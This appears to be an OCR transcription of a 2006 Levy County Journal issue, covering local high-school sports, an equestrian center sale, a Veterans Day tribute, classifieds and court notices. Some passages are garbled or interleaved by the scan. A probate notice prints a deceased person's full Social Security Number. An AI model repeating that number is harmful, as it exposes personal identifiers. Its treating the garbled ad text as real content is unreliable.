happen," Cooper said. "All you can do is learn from them and move on. We did learn a lot from the race and hopefully we will be able to put it to good use next year. We started bad, had trouble in qualifying, but once the race started things started to get better.
I thought we might be able to make it" (See Cooper, Page 11)

Aulsons put Black Prong on the market

'Deerly' Departed

BY NEAL FISHER
SPORTS WRITER

BRONSON-Three years ago Maureen and Alan Aulson bought approximately 90 acres of land nestled inside the Goethe State Forest near the city of Bronson. Originally bought as the Aulsons' personal training facility, the couple transformed the land into what is now known as the Black Prong Equestrian Center. The couple made the transformation of the land into a public facility due to what became a heavy demand for an equestrian center in the area. Within its short existence, the center has become world renowned and one can find just about every kind of entity needed to participate in the sport. Some examples of what exists inside the center are on-site world class trainers, nine regulation-size dressage arenas, practice obstacles, a marathon course, more than 150 miles of trails in the Goethe State Forest and convenient lodging options. However, even with the pride of building the facility from scratch, the Aulsons have decided to sell it due to Alan's commitment to spend more time in what is known as horse driving.

Journal photo by Carolyn Risner. THE SOUTH gate of Black Prong Equestrian Center remains open although its owners are looking for new buyers.

"The county commission and Levy County in general have been very helpful to us and we are very grateful for it," Aulson said.
"I am sad to let it go, but it is just too much right now with the focus and concentration I need to con- tinue to participate in driving. The area is one of the largest driving communities in the area and we hope to keep the facility in the horse commu- nity." Even though the couple is Keep on Flushing ': A&M Plumbing Enterprises Inc. Remodel, Re-Pipe, New Construction, Mobile Home Hook-Ups and Water Heaters. Serving the Tri-County area. Bronson (352)486-3509. not looking for a particular group or kind of individual as far as to whom to sell the facility to, they are requir- ing that the buyer honors the commitments already made for the 2007 season. The couple has received several phone calls as their weekly newsletter first indi- cated the facility was up for sale. Among the other benefits the facility has brought to the area is an increase in both the value of the real estate and its subsequent development. It also serves as a community oriented location in a coun- ty where few exist at a low price. "I am most proud of it becoming a jewel for the equestrian community and it is a first class facility that can hold world class shows," Aulson said. "We want the' public to know it is a gem in a great community." The Aulsons hold private property and will maintain a residence in the area. Sse UprideV iat D F cS s e Air Codt n & Hetn ALLSASOSHATIG&A/ Stae erifed-AC0542 "YOR OMOR.ISOU-CNCRN 74Ij *1~d324321 Stphn/EWSTNDRD FR IVIG 325230 *6. ** 1a00-42-02 SMnmy - Warradsie & Roadside GRANT COTHRON and his sister Marjorie show off the 8-point buck Grant killed on opening day of hunting season. The buck spread measured 18inches. 1Cooper Continued from page 10 I bounced off of the wall. All in all though, it was a good season and we ended it really strong. That should give us a boost for next season." The number 98 special modified finished the race after his crew made repairs, but without his original chassis intact he limped home to the disappointing finish. 
Cooper has also seized victories at Orlando Speedworld, Columbia Motorsports Park in Lake City and New Smyrna Speedway this season. He also set the track record at New Smyrna Speedway.
First-year coach throws in the towel

BY NEAL FISHER
SPORTS WRITER

CHIEFLAND-Five months ago, Bobby Rast took over the Chiefland High School football program amidst the controversy that was the firing of his predecessor. And after one season and what seemed to be a rash of negative perception concerning how he was handling the rebuilding of the once proud Indians' program among the school's staunchest followers, Rast resigned. In what turned out to be Rast's only season at the helm of the Indians' program, the team fell to its worst record in over two decades, winning its lone game on homecoming night. That win came against Crescent City and spurred hope that perhaps the program was starting to bear the fruits of Rast's injection into it. However, the team failed to respond and lost its last four games by a combined 180-39 score.

Williston High School
Varsity Football: Friday 11/17 Eustis, 2nd round FHSAA playoffs
Girls Soccer: Monday 11/20 @ P.K. Yonge; Tuesday 11/28 @ Fort White; Wednesday 11/29 @ Interlachen; Friday 12/1 @ Newberry; Monday 12/4 Hawthorne; Friday 12/8 P.K. Yonge
Men's Varsity/J.V. Basketball: Friday/Saturday 11/17-18 Tip Off Classic @ Chiefland; Tuesday 11/21 Eastside; Tuesday 11/28 @ Newberry; Friday 12/1 @ Chiefland; Tuesday 12/5 @ Dixie County; Friday 12/8 P.K. Yonge; Saturday 12/9 Daytona Beach Shootout @ Daytona (J.V.)
Girls Varsity/J.V. Basketball: Thursday 11/16 @ St. Francis Catholic; Monday 11/20 @ The Rock; Tuesday 11/21 Interlachen; Tuesday 11/28 Chiefland; Thursday 11/30 Hawthorne; Friday 12/1 Ft. White; Tuesday 12/5 @ Newberry; Thursday 12/7 Dixie County

Bronson High School
Boys Varsity/J.V. Basketball: Tuesday 11/21 Newberry; Tuesday 11/28 @ Bell; Friday 12/1 @ Dixie County; Saturday 12/2 Oak Hall; Tuesday 12/5 @ Branford; Friday 12/8 @ Trenton; Saturday 12/9 @ Hawthorne; Tuesday 12/12 @ Mayo; Friday 12/15 Williston
Girls Varsity Basketball: Friday 11/17 @ St. Francis; Tuesday 11/21 @ St. John's; Tuesday 11/28 @ Bell; Monday 12/4 Seven Rivers; Tuesday 12/5 @ Branford; Friday 12/8 @ Trenton; Tuesday 12/12 @ Mayo; Thursday 12/14 The Rock
Boys/Girls Middle School Basketball: Monday 11/27 @ Bell; Thursday 11/30 @ Trenton; Saturday 12/2 Oak Hall (Boys); Tuesday 12/5 @ Yankeetown; Thursday 12/7 Chiefland; Tuesday 12/12 Yankeetown; Thursday 12/14 The Rock (Boys)

Red Devil Final Regular Season Statistics

Rushing (Attempts / Yards):
Minor 99 / 575
Evans 73 / 387
White 60 / 358
Timmons 101 / 325
Days 26 / 101
Cox 12 / 43
Brown 10 / 42
Welch 10 / 0
Floyd 1 / 0
Totals 392 / 1831

Passing (Completions / Attempts / Yards):
Timmons 57 / 115 / 1377
Total 57 / 115 / 1377

Receiving (Receptions / Yards):
J. James 20 / 488
White 7 / 202
M. Brown 11 / 213
Welch 3 / 129
Evans 6 / 97
T. Brown 3 / 75
C.J. James 3 / 77
Floyd 1 / 13
Whildon 3 / 83
Totals 45 / 1377

Tides for Cedar Key starting with Nov. 16 (heights in feet)
Th 16: Low 4:47 AM 0.6; High 11:00 AM 3.0; Low 4:50 PM 1.1; High 10:44 PM 3.4. Sunrise 6:57 AM, Sunset 5:37 PM. Moonrise 3:05 AM, Moonset 3:09 PM. Moon 21% visible.
F 17: Low 5:32 AM 0.2; High 11:52 AM 3.1; Low 5:29 PM 1.2; High 11:14 PM 3.6. Sunrise 6:57 AM, Sunset 5:37 PM. Moonrise 3:57 AM, Moonset 3:35 PM. Moon 14% visible.
Sa 18: Low 6:12 AM -0.1; High 12:39 PM 3.2; Low 6:05 PM 1.3; High 11:44 PM 3.7. Sunrise 6:58 AM, Sunset 5:36 PM. Moonrise 4:51 AM, Moonset 4:04 PM. Moon 8% visible.
Su 19: Low 6:49 AM -0.4; High 1:21 PM 3.2; Low 6:39 PM 1.4. Sunrise 6:59 AM, Sunset 5:36 PM. Moonrise 5:47 AM, Moonset 4:36 PM. Moon 3% visible.
M 20: High 12:13 AM 3.8; Low 7:25 AM -0.5; High 2:02 PM 3.2; Low 7:14 PM 1.5. Sunrise 7:00 AM, Sunset 5:36 PM. Moonrise 6:46 AM, Moonset 5:14 PM. Moon 0% visible.
Tu 21: High 12:43 AM 3.9; Low 8:01 AM -0.6; High 2:43 PM 3.1; Low 7:49 PM 1.6. Sunrise 7:01 AM, Sunset 5:35 PM. Moonrise 7:47 AM, Moonset 5:58 PM. Moon 0% visible.
W 22: High 1:15 AM 3.9; Low 8:39 AM -0.6; High 3:24 PM 3.0; Low 8:26 PM 1.7. Sunrise 7:01 AM, Sunset 5:35 PM. Moonrise 8:48 AM, Moonset 6:50 PM. Moon 1% visible.

Chiefland
High School
Boys Varsity/J.V. Basketball: Friday/Saturday 11/17-11/18 Chiefland High School Tip-Off Classic (Varsity); Monday 11/27 Seven Rivers; Thursday 11/30 P.K. Yonge; Friday 12/1 Williston; Tuesday 12/5 @ Taylor County; Thursday 12/7 Newberry; Friday 12/8 Dixie County; Monday 12/11 Trenton
Girls Varsity/J.V. Basketball: Thursday 11/16 @ Dunnellon; Monday 11/20 Ft. White; Tuesday 11/21 Newberry; Tuesday 11/28 Williston (Varsity); Thursday 11/30 @ The Rock (Varsity); Monday 12/4 @ Ft. White; Monday 12/11 Trenton; Tuesday 12/12 @ Bell

NEAL FISHER
LEVY COUNTY JOURNAL

College football is about the rivalry

Among the more painful losses the team endured this year were to cross-county rival Williston, Ocala Trinity Catholic (by a 65-0 score) and Yulee (a first-year program). Following the ouster of Sam Holland, the new coach had a tough road ahead in replacing a man who led the team to a state championship and unparalleled success during his tenure. However, in the eyes of many in the community he did little to cultivate the faith and belief a coach needs to have when rebuilding a program. Perhaps his Waterloo came when he called in sick as the team traveled to the Jacksonville area to face Yulee. It also did not help his cause that Holland remarked on his way out the door that "whomever the new coach is, he is walking into a goldmine of talent." That goldmine was severely stripped from the outset of Rast's term as the Indians' best player and running back bolted with Holland. The trend continued as several of the players left the team during the year. The team has quickly fallen from grace. The Indians' record in 2003 was 9-1.
However, since then their records have been 6-2-7 and this year's 1-9 mark. Cliff Norris, the superintendent of Levy County schools, made the decision to relieve Holland of his duties and hire the Indians' most recent coach. Now the position is vacant and yet again a new search begins in earnest. At the current time, indications are that no one is being considered. Norris was unavailable for comment. Chiefland Principal Pamela Asbell indicated the decision to resign was up to Rast and solely his choice. The coach remarked he made the decision based on the Quarterback Club's request for his resignation. Rast will remain at Chiefland High School as a teacher.

As Michigan prepares to travel to Columbus this weekend to take on their most eminent rival, the Ohio State Buckeyes, the game goes beyond just college football. It is what any sports fan, and maybe even a few devotees of the dramatic inkling, wants. As if playing for the championship of the nation's oldest conference, the Big Ten, a berth in the granddaddy of all bowls, the Rose Bowl, and a possible national title, one more time, as they have done several times in the past, isn't enough, consider what the production of the 2006 version of "The Big Game" brings to the sport with an overwhelming flair. It is two teams trying to put the exclamation point on the brilliance of a majestic season against one of the sport's historically five most accomplished programs in the game that makes or breaks their season. It is number one versus number two on the final regular season weekend of 2006. It is two teams playing for a perfect season.
It isn't just one of the teams needing to win in order to move on to the national championship game, while the other squad enters the game looking to savor the euphoria of derailing their opponents' days of hard work at the last possible moment. It is both teams needing to win in order to move on to the championship game. And other than the Oklahoma-Nebraska rivalry, no other combination of two teams has as much of a right to claim they should play each other in what is essentially the sport's biggest stage, a final four playoff game. Adding to the foreground of its sports splendor, the game will be played at a time of the year and in a location when the weather perfectly lends itself to the way football was supposed to be played. The air will be cool and crisp with just enough of an indication that winter's onset is looming in the background to make it a game about the uglies who toil in the trenches and ground warfare. But the weather will be clear enough to add just enough of the magical element and flow of a football game that a beautifully executed pass play brings to a contest of this magnitude. College football is about the rivalry. Players go to schools solely for the right to play the end-of-the-season rival. They live to beat their cross-city, state or region nemesis, and all is right with the world for the next year as the victory against the big rival lives on. The rivalries are so big that they are played on the last weekend of the season. But how many could match the grandeur, the pageantry and what the rivalry between Michigan and Ohio State has meant to the sport? It is "the big game" not only in the tangible sense of championships and the attention it has brought to college football, but also because in the arena of drama and the aftereffects it has created a rivalry few can match. Before this year only a handful of rivalries could match what this yearly battle has brought to the table.
Among the accolades are a nationally leading 17 national titles, 74 bowl appearances, 38 bowl victories, 16 Rose Bowl championships, 70 Big Ten titles, 47 appearances in bowls that have become a part of the Bowl Championship Series and 7 Heisman Trophy winners. In fact, 68 percent of the time the winner of "the big game" claimed the Big Ten title and the automatic berth in the BCS or Rose Bowl that goes with it. To further illustrate the point, this marks the fifth time the two rivals play each other ranked first and second, the most among any of the season-ending rivalries. On the more non-tangible side, the rivalry is littered with names and traditions that make it impossible for fans not to know about it. Names like "The Big House", "The Horseshoe", Bo, Fritz, Bump, Fielding, Woody, AC and Archie, traditions like the Go Blue banner and the dotting of the "i", and the maize and blue and the scarlet and gray color schemes are known nationally and roll off the tongues of sports fans. They are one or two word names, because there is nothing else that needs to be said. Sports fans know what they did or mean. In fact, the series moniker in itself is short and succinct. It needs no explanation. Both schools boast consecutive sellouts of over 100 games. "The Big House" is the largest outdoor stadium in the world. "The Horseshoe" has been measured to carry the largest decibel amount of any outdoor stadium. Every school has its big rival and it means just as much to the players and those involved with the school, but when a series has those kinds of monikers, it is one of the elite. See Neal, Page 13

Team will rely on speed, experience

BY NEAL FISHER
SPORTS WRITER

WILLISTON-With Jason Odom taking over the reins of Williston's basketball program, the team might have to take a step backward before it can go forward.
On the other hand, with five returning starters who have a world of talent, they might just give Williston High School something to wave their pitchfork about. "Right now we are learning the basics and fundamentals," Odom said. "The team lost in the first round of the district tournament last year and played around .500, but I think we can really improve on both this year. We have a lot of speed on this team and the girls are naturally athletic. The team is improving every practice and I think we will really be playing our best as the season progresses." The coach takes over a team that played a complicated offensive and defensive scheme last year. With the talent level of the team, he has installed a flexing 2-3 zone on both offense and defense. The offense is designed to swing the ball around the perimeter until the opposition wears down and gives the Lady Devils an open shot or an open lane for them to drive. With the open players from top to bottom in the paint, the defense has to collapse down and give the Lady Devils room to move the ball. The defense is a basic 2-3 static zone, but the coach has integrated a full court 1-3-1 press into their game plan. Look for the team to use the natural athleticism that the coach talked about to switch back and forth and tire their opposition out. After two pre-season games, the jury is still out as far as where exactly the team is when it comes to their ability to execute Odom's new scheme and game plan. But they certainly have proved they are not a team to take lightly, and improvements are being made on a regular basis. They won their first contest by a 60-35 score over Hamilton County and lost their second game to Fernandina Beach by a narrow two points. The team's starting five consists of Jasmine Smith, Margaret Brown, Portia Brown, Angel Floyd and Ciearra Gordon. With four seniors starting, it is unfortunate they will have to adapt to a new system and feel for the game.
However, the experience of the team will make it an easier transition to the new coach than for a team with fewer seniors. Margaret Brown is the lone starter who is not a senior; she is a junior. But the team's flow and rhythm begins and ends with her abilities and what she brings to the court. The team's point guard is an excellent field general, knowing when to pass, when to shoot and who is in the best position to get the ball. She also has an excellent shot. Odom expects her to compile a strong turnover-to-assist ratio during the season. As the point guard, it is anticipated that she would take over the leadership role on the team, and she has done so. The team's center, Gordon, is a powerful shot blocker and rebounder. Using her 6-foot frame, the long and lean body has become adept at using her long arms to get to the ball and grab it. As the team's forward, Portia Brown complements Gordon well. She is also a good rebounder. Her strength is her ability to block out in order to get the ball. She is an extremely aggressive player who gets to almost every loose ball. Angel Floyd lines up at the shooting guard. Along with Brown, she is the team's best shooter. A slasher, she scores in bundles and will be needed to give the team points. She also leads the team on the defensive side of the ball, meeting the opposition as they cross half court. The other guard is Jasmine Smith. She is a versatile player, playing both the wing position and point when Brown needs a rest. Playing in the frontcourt, sophomore Jessica Gates will spell the starters as she comes off the bench. Odom noted her energy and ability to play bigger than she is, as well as her deceptive physical strength. The other non-starter who will see significant time is Samone Kennedy. The talented guard still needs polishing, but she will have her opportunities during the season to grow into the role that the team needs her to play.
"We still have some things that we need to work on, but the improvement is promis- ing and the preseason games have made a difference," Odom said. "The demeanor towards the game has really changed.for the better. When we first started we only had six girls show up, so there. was a lot of negativity. "But the pre-season games have given the team confi- dence and it can be seen as we get better during every practice. They are staying within the limits of their abil- ity and are playing bigger than they are. The results as far as improving and the players getting the most out of their players have been there because of it." The team as it enters its first season under Odom also has grown stronger in- their ability to see the floor better. However, the team needs to fine-tune their shot. They have been working on the fundamental of.a sound shot, such-asisquaring to the basket and jumping off of the right foot. With only nine players, depth will become a problem if injuries become an issue. Odom is a graduate of P.K. Yonge and the University of Florida. He takes over the Lady Devils program after a successful athletic career at the high school level. There is Oklahoma-Ne- braska, Auburn-Alabama, USC-Notre Dame and Florida-Florida State and they can all compete with the credentials of "The Big Game." However with the scenario that has set up the 103rd meeting between Michigan and Ohio State, I hereby de- clare "the big game" is now number one among college football's finest rivalries. Not only did "the big game" add to its legacy in stats and its national promi- nence this year, but it has brought the college football season to a mouthwatering crescendo that even the other rivalries failed to match when they played each other as the top two teams in the land. The crescendo has come in ways never before seen, such as 111 press passes being issued and a reporter from Japan planning to attend the game. 
There has never been a game that was in essence a final four playoff game, and this year's "The Big Game" will be one that forever changes the feel of how college football crowns its national champion. It will be the culmination of a season in which both teams and the game itself will distinctively add their fingerprints to the sport in a way never before seen. Neal Fisher is the sports writer for the Levy County Journal. He may be reached at jcpirahna@yahoo.com.

2006 FHSAA Class 3A Football Championship. Host teams are in bold italics. Regional games at 7:30 p.m. local time unless otherwise noted. School reps report results/arrangements to football@fhsaa.org. Last updated Friday, November 10, 2006 at 11:36 PM.

Bronson Youth
Football Comings and Goings: In the 10-and-under league, the Bronson Packers scored an impressive 24-0 shutout victory over the Williston Knights. In the 13-and-under league, the Bronson Thunder suffered defeat at the hands of the other Williston team. The football playoffs began on Saturday, Nov. 11. Times and opponents are still to be determined.
Cheerleading Notes: The All-Star Cheerleading squad will travel to St. Augustine for a statewide competition on Nov. 18. The squad is composed of 23 girls ranging from ages five to 23.
Soccer Doings: Last week's soccer results: The Bronson Little Eagles captured a 3-0 shutout over Newberry I in the 6-and-under league. The Bronson Little Gators fell to Archer by a score of 3-2. It was not a good day for the 8-and-under league as the Bronson Eagles I managed to tie High Springs at 1-1, while the Bronson Eagles II, by a score of 2-1, went down to defeat at the hands of Williston II. In the 10-and-under league, it was the Eagles taking a 1-0 decision over Newberry II. The Eagles fell by a 1-0 count to Alachua II in the 12-and-under league. A 2-2 tie was the final result of the Eagles' match against Alachua I in the 14-and-under league. The league's post-season tournament, the Alachua World Cup, was played on Friday, Nov. 11 and Saturday, Nov. 12 at the Alachua Recreational Center.

WILLISTON LADY DEVIL BASKETBALL 2006-2007
#4 Jasmine Smith, Senior
#5 Sharneka Brown, Senior
#10 Margaret Brown, Junior
#12 Arnetra Richardson, Freshman
#22 Portia Brown, Senior
#23 Angel Floyd, Senior
#24 Ciearra Gordon, Senior
#25 Simone Cannady, Freshman
#32 Jessica Gates, Sophomore
Mgr. Erica Williams, Senior
Head Coach Jason Odom; Assistant Coach Anthony Johnson

For the best in local sports coverage, read the Levy County Journal.

Williston High School Lady Red Devil Basketball 2006-07 Schedule (* denotes district games)
11-14-06 North Marion, Away, 6:00
11-16-06 St. Francis Catholic, Away, 7:00
11-20-06 The Rock, Away, 5:30
11-21-06 Interlachen, Home, 6:00
11-28-06 Chiefland*, Home, 7:00
11-30-06 Hawthorne, Home, 7:00
12-01-06 Ft. White*, Home, 7:00
12-05-06 Newberry*, Away, 7:00
12-07-06 Dixie Co.*, Home, 7:00
12-11-06 P.K. Yonge*, Away, 7:00
12-14-06 Crystal River, Away, 7:30
1-05-07 Chiefland*, Away, 7:00
1-09-07 Dixie Co.*, Away, 7:00
01-11-07 North Marion, Home, 7:00
01-12-07 Ft. White*, Away, 7:00
01-16-07 Newberry*, Home, 7:00
01-18-07 P.K. Yonge*, Home, 7:00
01-19-07 Interlachen, Away, 6:00
01-25-07 Crystal River, Home, 7:00
01-26-07 Hawthorne, Away, 6:00
01-30-07 District Tournament @ P.K. Yonge*

Page 14 LEVY COUNTY JOURNAL AROUND LEVY COUNTY THURSDAY, NOVEMBER 16, 2006

ACS Great American Smokeout is today

The Great American Smokeout is today, Nov. 16. Lay down the cigarettes and start your way to a healthier you. The American Cancer Society today marked its 30th annual Great American Smokeout. The American Cancer Society urges the residents of Levy, Gilchrist, Dixie and Lafayette counties to make an effort to quit smoking. Secondhand smoke is a health hazard that contains more than 4,000 chemicals, including over 60 carcinogens. In addition to increasing the risk of heart disease, stroke, and cancer in nonsmokers, secondhand smoke is also responsible for 35,000 to 40,000 deaths from heart disease and 3,000 lung cancer deaths in nonsmokers annually. It's inconceivable, but the tobacco industry spends more than $15.4 billion per year and more than $42 million per day advertising and marketing its lethal products. Smoke-free policies, like Florida's amendment six, cover all workplaces and protect workers and patrons from the dangers of secondhand smoke. These policies also allow those most vulnerable to secondhand smoke exposure, the elderly, children, and people with certain health conditions, to enjoy dining out without compromising their health. Neither ventilation systems nor nonsmoking sections can adequately protect people from exposure to the free-floating poisons of secondhand smoke. More than 70 percent of smokers want to quit and attempt to do so each year, but without help, most fail. Smoking cessation counseling and medications are proven to help and effectively improve quit rates. Telephone-based services are a convenient and effective way to provide information and counseling; therefore, Quitlines have quickly become the most successful means of achieving tobacco cessation for large populations, nearly doubling the chances that tobacco users will quit successfully. The American Cancer Society is dedicated to offering help to those who want to quit smoking. Please call 1-800-ACS-2345 (1-800-227-2345) to reach a Quitline program near you. The American Cancer Society is dedicated to eliminating cancer as a major health problem by saving lives, diminishing suffering and preventing cancer through research, education, advocacy and service. Founded in 1913 and with national headquarters in Atlanta, the Society has 14 regional divisions and local offices in 3,400 communities, involving millions of volunteers across the United States. For more information anytime, call toll free 1-800-ACS-2345.

GETTING READY to combat smoking are, from left, Maggie Cash, Valerie Boughanem, Principal Matthew Myers, Kim Nemeth and Bobbie Burnett.

The task force against teen drug use is planning activities at Bronson Middle and High School. Some of the activities include asking businesses to participate by offering discounts to people who turn in the rest of their pack of cigarettes because they want to stop smoking. There will be a jump rope contest during PE to prove the importance of a healthy heart and lungs. Students, parents and business people are encouraged to adopt a smoker by enabling them to stop smoking. Students who do not smoke will speak about the importance of never starting. Students who have quit will speak about "Quitters are winners." Other informational activities will be helpful, including daily announcements, posters throughout the school, and a banner for students to sign with ideas of ways to stop smoking or to never start smoking. Ideas: Adopt a smoker, encourage them to quit and be there for them. See the following website: http:// PED/ped 10 4.asp. Businesses could offer a discount to people who turn in the rest of a pack of cigarettes. Other helpful websites: com/kopykit/reports/smokeout.htm.

News Briefs

Yard sale
The New Sepulchre Church of God, Bronson, will be holding a yard sale on Saturday, Nov. 18 starting at 7:30 a.m. A free breakfast will be served consisting of hot fish and grits. New Sepulchre Church is located at 431 Pine Street, Bronson.

Basket auction set
Friends of the Williston Library will hold its annual holiday open house and basket auction Saturday, Dec. 9 from 10 a.m. until 2 p.m. at the library on Noble Avenue. Silent bids will be received on the baskets and proceeds will assist in the purchase of books, materials and equipment for the library.
It will also enable the Friends to provide free educational and entertaining programs throughout the year.

EZDA meetings
Enterprise Zone Development Agency will meet Tuesday, Nov. 28 at 9 a.m. at Levy Abstract & Title, 50 Picnic St., Bronson. Tentative meetings, if needed, will be held in the same location Dec. 5 and Dec. 12 at 9 a.m. The agenda includes finalizing/revising the Enterprise Zone application. For more information contact Pam Blair, Enterprise Zone Development Agency, at 352-486-5470.

Erica Allen of the Inglis Shell Station reads the LEVY COUNTY JOURNAL, The County Paper. Also available at these locations: Bronson Post Office; Park Ave.; Church's Chicken/Jiffy; Dollar Tree; US 19 Gas Mart; Yogiraj, US 19. Erica Allen is a resident of Inglis and is an evening CSR at The Inglis Shell Station. When she's not busy with her customers, Erica enjoys reading the Levy County Journal's current events. Pick up your copy today. You'll be glad you did. To subscribe: call Robin at 490-4462. We accept Visa/Mastercard. Two locations to serve you: 440 South Court St., Bronson; 13 South Main St., Chiefland.
Journal photo by Rhonda Griffiths

SALUTING THE LIVING
Williston pays tribute to its vets
BY CAROLYN RISNER
WILLISTON - Described as a scene Norman Rockwell would have painted for the Saturday Evening Post, the city of Williston came together Saturday to pay tribute to this nation's heroes: our military men and women. From the posting of the colors by Williston High School's Jr. ROTC to the moving solo of God Bless the USA, the evening was filled with an air of patriotism and pride. Video clips honoring veterans were played to the more than 150 people who gathered on Veterans Day, and the high school band moved the audience with the national anthem and several patriotic selections.
The band also played each military branch's theme, and veterans stood to rousing applause when their branch was noted. "It doesn't get anymore American than this," said Rep. Larry Cretul, the evening's keynote speaker. Cretul commended the 25 million people who have served this country, noting they come from all economic, racial and social backgrounds. "They are our heroes," he said. With U.S. soldiers in 138 countries, Cretul said, "As Americans, we don't give up, give out or give in. We press onward holding up our country to a high standard."

VETERANS FROM all branches were honored Saturday in Williston. Some shared stories with their comrades, above, while others like Robert Lowyns, left, stood proudly, or Michael Thayer and James Taylor chatted with friends, right.

In Flanders Fields
By Lieutenant Colonel John McCrae, MD (1872-1918), Canadian Army

In Flanders fields the poppies blow
Between the crosses, row on row,
That mark our place; and in the sky
The larks, still bravely singing, fly
Scarce heard amid the guns below.

We are the Dead. Short days ago
We lived, felt dawn, saw sunset glow,
Loved and were loved, and now we lie
In Flanders fields.

Take up our quarrel with the foe:
To you from failing hands we throw
The torch; be yours to hold it high.
If ye break faith with us who die
We shall not sleep, though poppies grow
In Flanders fields.

Journal photos by Carolyn Risner
THE WILLISTON JUNIOR ROTC posted the colors, right, while music from many sources moved the crowd. Pvt. Zach Russ, left, was among those recognized who are currently serving our country.

Page 16 Classifieds - Deadline Monday 2 p.m.
Legals - Visit: 13 South Main Street, Chiefland; 440 South Court Street, Bronson. 352-486-2312 / 352-486-5042

Miscellaneous (125)
FREE FIREWOOD, sawed. Call 486-2118. 11/16f
FREE KITTENS - All gray, about 10 weeks old.
2 male, 2 female. Call Cassidi at 352-577-4399. 11/16f

Rentals - Want to Rent (335)
LEVY COUNTY JOURNAL reporter needs a place to lay his head at night. Outstanding sports writer is forced to commute three hours and really wants to make a home base in Levy County. If you have a spare room, small apartment or mobile home you want to rent for $200-$300 a month, or if you need a roommate to share expenses, call Neal at 813-335-1095 or 352-490-4462.

Real Estate - Houses for Sale (410)
CORNER LOT WITH 2 "Cracker Houses" in Williston. Close to everything, downtown, banks, Hwy 27-A & Hwy 41. City water & sewer, located on paved road at NE 9th Street. $20,000 obo. 352-208-3200 cell. 11/16p

Mobile Homes for Sale (415)
SINGLE-WIDE mobile home, 2 BR with expansion, needs work, $2000. You move at your expense. 352-486-2248. 12/6b
MUST SELL! MOVING out of state. 3/2 doublewide with split plan. 1 1/2 acres, large trees, carport, covered back porch, tractor and tool shed. $95,000. Call 352-486-7027. 11/16b

(425)
2 ACRES BETWEEN Williston & Morriston. Paved road frontage on SR 121. Wooded! High and dry! Owner financing. No down payment. Only $359/mo; total: $34,900.00. Call 352-215-1018. 11/16p

For Sale (510)
FAT GOOSE AUCTION holding estate auctions each Friday in downtown Chiefland at 7:00 pm. Always outstanding estate merchandise. Our box lots start at 6:30 pm. Several vintage Lionel & American Flyer train sets from the early 30's & 40's, the rare MTH Burlington Zephyr set in its box. Large statues, carved ivory pieces, artwork of all types, items from 3 different antique stores. Primitives of all types: fainting couch, crocks, oxen yoke, great glassware, lots of jewelry. Furniture: early drop leaf mahogany table, also a nice mahogany sewing chest w/glass knobs and contents, large slab coffee table, matching hutches, fishing gear and all types of smalls, tools, and lots more. AU2738 (Bruce Denestein) AB2565 10% BP. For more info.
call Jim Morehead at (352) 356-1065.

Yard Sales (515)
YARD SALE SAT. Nov. 18, 7-?. Go north on 337 past Levy County Jail about 4 miles to 126th Street and turn left. First big yellow house on right. 352-486-8141.

Misc. (550)
NEW MOWER & CHAIN SAW PARTS: Stihl, Husqvarna, AYP, Murray, Sears, MTD, Briggs, Kohler, Robin, and Honda. Blades for most mowers. Beauchamp Saw Shop. 352-493-4904. 1/14/07

This space for sale. Call Robin to purchase at a low rate: 490-4462.

BRONSON SELF STORAGE, (352) 486-2121. HOURS: Monday-Friday 10 am-5 pm, Saturday 10 am-3 pm. 839 E Hathaway Ave, behind Dollar General.

Want to Buy
WILLISTON RECYCLE Salvage: $50.00 premium for cars or trucks. Cash for all types scrap metal. Call today 528-3578. 12/7p

Recreation - Boats & Motors (605)
MOBILE MARINE SERVICE - Boat motors wanted, dead or alive! 352-486-4316. 12/28p

Legal Notices (900)
IN THE CIRCUIT COURT OF THE EIGHTH JUDICIAL CIRCUIT IN AND FOR LEVY COUNTY, FLORIDA. CASE NUMBER: 06-CA-662
DOREEN M. CASLE, Plaintiff, vs. T. RICHARD HAGIN and T. RICHARD HAGIN AS TRUSTEE, together with their heirs, should they be deceased, and any natural unknown persons who might be the unknown spouse, heirs, devisees, grantees, creditors, unknown tenants or other parties claiming by, through, under or against the above-named defendants, Defendants.
NOTICE OF ACTION
To: T. RICHARD HAGIN and T. RICHARD HAGIN AS TRUSTEE
You hereby are notified that a Complaint to Quiet Title was filed in this court on August 10, 2006. You are required to serve a copy of your written defenses, if any, on the petitioner's attorney, whose name and address is: Sherea-Ann Ferrer, P.O. Box 721894, Orlando, Florida 32872, and file an original with the clerk of this court on or before December 22, 2006. Otherwise, a judgment may be entered against you for the relief demanded in the petition.
Property Description: TRACT #63 University Estates, an unrecorded subdivision, in Section 16, Township 12 South, Range 17 East, Levy County, Florida, being more particularly described as follows: The North 1/2 of the Southeast 1/4 of the Northeast 1/4 of the Northeast 1/4 of the Northeast 1/4 of Section 16, Township 12 South, Range 17 East, Levy County, Florida. Witness my hand and seal on November 6, 2006.
DANNY J. SHIPP, Clerk of the Court. By: Gwen McElroy, Deputy Clerk. (COURT SEAL)
Pub: Nov. 16, 23, 30, Dec. 7, 2006

GATOR WORKS COMPUTING - Sales, Repair, Upgrade, Consulting, Programming, Networking, Microsoft Computer Training Classes

IN THE CIRCUIT COURT FOR LEVY COUNTY, FLORIDA, PROBATE DIVISION. File No.: 38-2006-CP-000057
IN RE: ESTATE OF SONIA L. JOHNSON, Deceased.
NOTICE TO CREDITORS
The administration of the estate of Sonia L. Johnson, deceased, whose date of death was May 23, 2005, and whose Social Security Number is 299-40-6564, is pending in the Circuit Court for Levy County, Florida, Probate Division, the address of which is 355 South Court Street, Bronson, Florida 32621. The names and addresses of the personal representative and the personal representative's attorney are set forth below.
All creditors of the decedent and other persons having claims or demands against decedent's estate on whom a copy of this notice is required to be served must file their claims with this court WITHIN THE LATER OF 3 MONTHS AFTER THE FIRST PUBLICATION OF THIS NOTICE OR 30 DAYS AFTER THE DATE OF SERVICE OF A COPY OF THIS NOTICE ON THEM. The date of first publication of this Notice is November 16, 2006.
Personal Representative: Shelia Kay Hand, 17790 SE 60th Lane, Morriston, Florida 32668
Attorney for Personal Representative: THE LAW OFFICE OF RICHARD M. KNELLINGER, P.A., Karen S. Yochim, for the Firm, 2815 NW 13th Street, Suite 305, Gainesville, Florida 32609-2865. Telephone: (352) 373-3334. Florida Bar No. 670847
Pub: Nov. 16, 23, 2006

IN THE CIRCUIT COURT FOR LEVY COUNTY, FLORIDA, PROBATE DIVISION. File No.
38-2006-CP-0288
IN RE: ESTATE OF CHARLES FREDERICK AUSTIN, Deceased.
NOTICE TO CREDITORS
The administration of the estate of CHARLES FREDERICK AUSTIN, Deceased, whose date of death was August 4, 2006, File Number 38-2006-CP-0258,
